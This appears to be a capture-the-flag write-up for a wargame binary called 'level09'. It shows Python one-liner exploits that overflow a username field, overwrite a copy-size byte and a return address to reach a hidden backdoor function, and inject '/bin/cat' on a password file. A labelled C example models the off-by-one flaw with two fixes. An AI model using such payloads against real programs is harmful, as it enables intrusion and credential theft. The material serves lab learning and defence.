/home/users/level09/level09 < <(python -c "print('a'*40+'\xff'+' '*208+'/bin/cat /home/users/end/.pass;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')")
python -c "print('a'*40+'\xff'+' '*208+'/bin/cat /home/users/end/.pass ;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')" | env -i /home/users/level09/level09
With Ghidra we find a hidden function, secret backdoor; we will try to call it.
We notice a small flaw in the snprintf: its size argument can be overwritten by the 41st character of the username. We set it to 0xFF because that is the largest value, then we can do a ret to the secret backdoor function, which calls system. With spaces and a cat of the last flag, it works!
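Added example (not part of the original write-up or the level09 binary): a minimal C model of the off-by-one described above, where a 41st username byte lands on the size used by a later copy, next to two fixes. The struct layout, the one-byte length, the value 140 and all function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 40   /* username field size, as in the write-up */
#define MSG_CAP  140  /* constructed value: true size of the destination buffer */

/* Assumed, simplified layout: a one-byte copy length sits right after the username. */
struct record { unsigned char raw[NAME_LEN + 1]; };  /* [0..39] name, [40] length */
typedef void (*setter)(struct record *, const unsigned char *);

/* Off-by-one: "<=" lets a 41st input byte land on the length byte. */
static void set_name_vulnerable(struct record *r, const unsigned char *in) {
    for (size_t i = 0; i <= NAME_LEN && in[i]; i++)
        r->raw[i] = in[i];
}

/* Fix 1: the loop bound matches the field size. */
static void set_name_fixed(struct record *r, const unsigned char *in) {
    for (size_t i = 0; i < NAME_LEN && in[i]; i++)
        r->raw[i] = in[i];
}

/* Fix 2: clamp the stored length to the destination size where it is used. */
static size_t copy_len(const struct record *r) {
    size_t n = r->raw[NAME_LEN];
    return n > MSG_CAP ? MSG_CAP : n;
}

/* Feed 40 'a' bytes plus 0xff (constructed input) to a setter; return the length
   the later copy would use, raw or clamped. */
static size_t len_after(setter set, int clamp) {
    unsigned char in[NAME_LEN + 2];
    struct record r;
    memset(in, 'a', NAME_LEN);
    in[NAME_LEN] = 0xff;
    in[NAME_LEN + 1] = '\0';
    memset(r.raw, 0, sizeof r.raw);
    r.raw[NAME_LEN] = MSG_CAP;
    set(&r, in);
    return clamp ? copy_len(&r) : r.raw[NAME_LEN];
}

int main(void) {
    printf("vulnerable=%zu fixed=%zu vulnerable+clamp=%zu\n",
           len_after(set_name_vulnerable, 0), len_after(set_name_fixed, 0),
           len_after(set_name_vulnerable, 1));
    return 0;
}
```

Either fix alone keeps the later copy within the destination buffer; applying both means a future regression in the setter cannot turn into an oversized copy.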
This should win:
python -c "print('a'*40+'\xff'+' '*204+'/bin/cat /home/users/end/.pass ;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')" | env -i /home/users/level09/level09